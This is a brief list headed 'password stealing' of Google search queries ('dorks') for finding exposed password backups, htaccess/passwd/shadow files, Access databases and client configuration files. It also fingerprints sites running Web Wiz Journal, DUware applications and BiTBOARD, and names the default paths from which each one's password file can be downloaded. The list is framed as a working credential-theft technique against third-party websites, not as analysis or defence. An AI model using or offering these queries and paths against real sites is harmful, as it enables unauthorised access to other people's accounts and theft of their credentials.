
password stealing


“http://*:*@www” site : passwords for site, stored as the string “http://username:password@www…”
filetype:bak inurl:”htaccess|passwd|shadow|htusers” : file backups, potentially containing user names and passwords
filetype:mdb inurl:”account|users|admin|administrators|passwd|password” : mdb files, potentially containing password information
intitle:”Index of” pwd.db : pwd.db files, potentially containing user names and encrypted passwords
inurl:admin inurl:backup intitle:index.of : directories whose names contain the words admin and backup
“Index of/” “Parent Directory” “WS_FTP.ini” filetype:ini WS_FTP PWD : WS_FTP configuration files, potentially containing FTP server access passwords


intitle:index.of trillian.ini : configuration files for the Trillian IM
eggdrop filetype:user user : configuration files for the Eggdrop ircbot
filetype:conf slapd.conf : configuration files for OpenLDAP
inurl:”wvdial.conf” intext:”password” : configuration files for WV Dial
ext:ini eudora.ini : configuration files for the Eudora mail client
filetype:mdb inurl:users.mdb : Microsoft Access files, potentially containing user account information
intext:”powered by Web Wiz Journal” : websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http:///journal/journal.mdb instead of the default http:///journal/

“Powered by DUclassified” -site:duware.com
“Powered by DUcalendar” -site:duware.com
“Powered by DUdirectory” -site:duware.com
“Powered by DUclassmate” -site:duware.com
“Powered by DUdownload” -site:duware.com
“Powered by DUpaypal” -site:duware.com
“Powered by DUforum” -site:duware.com
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
: websites using the DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, which by default make it possible to obtain the passwords file – for DUclassified, just enter http:///duClassified/_private/duclassified.mdb instead of http:///duClassified/

intext:”BiTBOARD v2.0” “BiTSHiFTERS Bulletin Board” : websites using the Bitboard2 bulletin board application, which on default settings allows the passwords file to be obtained – enter http:///forum/admin/data_passwd.dat instead of the default http:///forum/forum.php
